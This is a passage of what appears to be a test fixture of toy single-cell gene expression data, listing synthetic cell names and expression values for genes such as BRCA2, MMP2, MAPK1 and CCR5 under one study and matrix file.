"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BRCA2 Expression": {
"name": "BRCA2 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.0,
2.0,
2.0,
2.58,
3.0,
3.0,
2.81,
1.58,
2.32,
1.58,
3.0,
2.0,
2.0,
2.0,
1.0,
1.0,
2.81,
2.81,
2.32,
2.58,
3.0,
1.0,
2.32,
2.81,
1.58,
1.0,
2.58,
2.81,
2.58,
2.0,
3.0,
1.0,
3.0,
2.81,
2.81,
2.0,
3.0,
2.58,
3.0,
2.32,
3.0,
1.58,
2.32,
2.81,
2.32,
1.0,
3.0,
2.0,
2.0,
2.0,
1.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MMP2 Cells": {
"name": "MMP2 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB7_BazMoo_5CBDCCDBCDBCDCCC-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MMP2 Expression": {
"name": "MMP2 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
2.0,
2.58,
2.0,
2.81,
2.32,
3.0,
2.58,
1.0,
2.0,
1.58,
2.58,
1.0,
2.58,
1.58,
1.0,
2.32,
1.58,
1.58,
2.32,
1.58,
3.0,
1.58,
2.81,
1.58,
2.0,
3.0,
2.32,
1.0,
3.0,
2.0,
3.0,
1.58,
2.58,
1.58,
3.0,
2.81,
1.58,
2.0,
1.0,
3.0,
1.58,
2.32,
2.81,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MAPK1 Cells": {
"name": "MAPK1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB8_BazMoo_3CCABBAABDCCBDCB-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB1_BazMoo_6ABAAADABDACDDDA-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MAPK1 Expression": {
"name": "MAPK1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.32,
2.0,
1.58,
2.32,
2.32,
1.0,
2.32,
2.32,
2.32,
2.32,
2.81,
2.0,
3.0,
2.58,
3.0,
2.81,
1.58,
1.0,
2.81,
1.0,
1.58,
3.0,
2.81,
2.0,
2.81,
1.58,
2.32,
2.0,
2.32,
2.0,
1.58,
1.0,
1.0,
2.81,
2.81,
3.0,
3.0,
1.0,
2.0,
1.58,
2.32,
1.58,
3.0,
2.0,
2.0,
3.0,
1.58,
2.32,
2.81,
1.58,
3.0,
2.58,
3.0,
2.58,
1.0,
2.0,
2.58,
2.32,
3.0,
3.0,
3.0,
1.58,
2.32,
2.81,
2.81,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"SERPINE1 Cells": {
"name": "SERPINE1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"SERPINE1 Expression": {
"name": "SERPINE1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.32,
3.0,
2.32,
2.58,
2.81,
3.0,
1.58,
2.32,
2.32,
2.0,
1.58,
1.0,
2.58,
1.58,
2.0,
3.0,
1.58,
1.0,
2.58,
1.0,
1.58,
2.32,
2.0,
2.58,
2.0,
3.0,
2.32,
3.0,
1.58,
2.58,
2.32,
2.0,
1.58,
2.58,
1.58,
1.0,
1.0,
2.32,
2.32,
1.58,
2.81,
1.58,
3.0,
1.58,
3.0,
2.58,
1.0,
2.58,
2.0,
2.58,
3.0,
1.58,
2.81,
2.32,
1.0,
3.0,
2.58,
1.58,
2.58,
2.32,
2.81,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CCND1 Cells": {
"name": "CCND1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB8_BazMoo_3CCABBAABDCCBDCB-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CCND1 Expression": {
"name": "CCND1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
3.0,
1.58,
2.32,
2.81,
1.58,
2.32,
2.0,
1.0,
3.0,
2.32,
2.0,
3.0,
1.58,
2.58,
2.81,
2.0,
2.32,
3.0,
2.32,
2.81,
2.32,
2.32,
2.58,
1.0,
2.58,
2.81,
2.32,
3.0,
1.0,
2.81,
3.0,
1.58,
2.0,
2.0,
2.58,
2.58,
2.58,
2.58,
2.32,
1.0,
2.58,
2.81,
1.0,
2.32,
1.58,
1.58,
2.0,
2.32,
1.0,
1.58,
2.0,
1.0,
1.58,
2.32,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CCR5 Cells": {
"name": "CCR5 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB4_BazMoo_2DABDACBCCCCADBC-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB8_BazMoo_3CCABBAABDCCBDCB-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB4_BazMoo_2AABBAAABCBBACBB-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CCR5 Expression": {
"name": "CCR5 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.0,
2.0,
1.58,
3.0,
2.0,
3.0,
2.58,
1.0,
1.0,
2.81,
3.0,
1.58,
2.0,
2.58,
2.0,
2.32,
1.0,
3.0,
2.58,
2.0,
2.0,
2.0,
2.81,
3.0,
1.0,
2.58,
3.0,
2.58,
2.81,
2.0,
2.0,
2.32,
3.0,
2.0,
1.0,
1.58,
2.32,
1.0,
3.0,
1.0,
2.0,
2.32,
2.0,
2.81,
2.58,
1.0,
2.32,
2.32,
2.81,
2.32,
2.58,
2.32,
2.0,
2.81,
2.32,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"GSTT1 Cells": {
"name": "GSTT1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
